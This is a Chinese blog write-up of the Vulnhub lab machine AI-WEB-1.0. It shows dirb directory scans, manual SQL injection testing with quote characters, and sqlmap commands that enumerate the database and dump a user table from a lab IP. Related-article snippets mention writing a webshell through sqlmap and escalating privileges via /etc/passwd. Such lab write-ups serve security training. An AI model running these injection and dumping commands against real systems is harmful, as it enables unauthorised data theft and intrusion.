Vulnhub靶机:AI-WEB-1.0

已于 2024-08-19 17:54:42 修改
阅读量235 收藏 1
点赞数 7
文章标签: 前端
于 2024-08-19 17:45:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81881972/article/details/141328293
版权

一,先访问一下网页

d6628acd1cd6471ba8407125be92dc4e.png

二,对网站进行目录和文件扫描

8ea594cfb23e4a32964764540ca3fc6a.png

出现robots.txt

三,进入网站查询

a3afb46ed83d46d783bf15ebe55e8d0d.png

访问发现/m3diNg0/没有权限

0d1f7045ed9043e1b42a4e4b7c03fca4.png

访问发现/se3reTdir777/目录可以访问成功

fb77a346d271401583c17f1dee473e00.png

 

四,使用dirb进行扫描

dirb http://172.16.1.88/m3diNf0/
dirb http://172.16.1.88/se3reTdir777/

e68b87778f124f0bbec6092cb4ba5c78.png

db685ed1157a46cba53bbf1d97920f38.png

 

扫描发现到172.16.1.88/m3diNf0/有一个info.php页面

尝试访问

d7b3d3f2d8734357aebfcf1224ce8f08.png

172.16.1.88/se3reTdir777/有一个index.php页面

尝试访问

f5417207c9194ae08ef08b04d1fbfb5d.png

五,发现是查询页面 考虑sql注入

尝试注入:

输入一个1试试

ed9936a7e1c64c6688142b6fb6a6c29c.png

返回成功

26dbefe8c817477683ef9a73ff8f7e05.png

返回成功

bb87d53da84c4c94938c563533b35a19.png

返回成功

6c0a6073b6d042948810936e78784f72.png

当我们输入id为4时,返回失败了,查询结果为无
我们可以从数据库中知道一共有三个用户

尝试使用单引号结果报错(1')

87023645a046440694c68b124708bba4.png

产生报错,报错原因是单引号末闭合
再加一个单引号,两个单引号刚好构成闭合,如果返回正常的话则存在sql注入漏洞

714b77ca9193483aa71b6d8abcab6879.png

可以看到正常返回了id为1的结果,存在注入
使用sqlmap进行注入攻击:
由于是post数据包,我们需要打开BP进行抓包,将数据包进行复制,存储到txt中进行sqlmap测试

091b9f16146940f2b49b409a18023529.png

六,使用sqlmap进行扫描

查看当前服务下所有数据库

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

daa2e6493f724e18a4084a75bee2b577.png

查看当前数据库下所有表

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

afaab1ea3a5b44c4a0b399fcbb33105e.png

判断User表下字段名称

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

 

 

ac359a5472ba45159518a9ef3e4fa3f1.png

将id表中数据dump下来

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

fcb2b57eb46848519da1b5e39e03ff72.png

 

 

 

 

你不要在理我了
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记录一次vulnhubAI-WEB-1.0靶场复现
sszsNo1的博客
06-24 234
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4200
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1417
vulnhub靶机AI-Web-1.0渗透笔记
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 990
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 309
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1426
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
Vulnhub: AI-WEB-1.0靶机
qq_43884092的博客
05-28 47
phpinfo泄露网站根目录,sqlmap写入webshell,写入用户到/etc/passwd提权
Vulnhub靶机AI-WEB-1.0渗透骚操作(超详细讲解教程)
weixin_67832625的博客
07-27 397
超详细的靶场讲解,适合小白入门到提权的操作,本文介绍了从主机发现,端口扫描,发现sql注入进行漏洞利用,开启服务到提权的文章。
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1073
vulnhub ai-web1.0
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
JAVA-WEB资源配置
caryeko的专栏
08-15 225
用JAVA进行编写WEB项目时,我们一般需要对WEB进行统一配置,例如制定拦截路径、页面解析器、跨域配置、fastjson报文解析、文件上传大小配置等。
使用WebSocket实现一个简易的聊天室
qq_51321722的博客
08-14 466
其次,要有相关配置类以及Controller。我这里的框架是SpringBoot。首先,我们要有一个前端页面。
pywebview 入门
最新发布
小小宾的博客
08-18 546
pywebview 是一个轻量级的 python 库,旨在简化桌面应用程序的开发。它利用系统的 WebView 组件,使得开发人员可以使用现代 Web 技术(HTML、CSS、JavaScript)来创建用户界面,同时使用 python 处理业务逻辑。pywebview 使得创建跨平台桌面应用程序变得更加简单和高效。
使用 TinyVue 组件库搭建前端项目的实操体验
Echo_Wish的博客
08-14 824
在这个示例中,我们创建了一个包含用户名和密码输入框的表单,并添加了表单验证功能。总的来说,TinyVue 组件库为前端开发提供了强大的支持和便利。通过这次活动,我不仅提升了自己的开发技能,还对 OpenTiny 的产品有了更深入的了解。在这个示例中,我们引入了 TinyButton 组件,并在按钮点击时触发一个成功消息。TinyVue 组件库提供了丰富的 UI 组件,可以满足各种业务需求。在项目中,我使用了 TinyVue 提供的多个组件来构建页面。首先,我按照官方文档的指引,完成了开发环境的准备工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值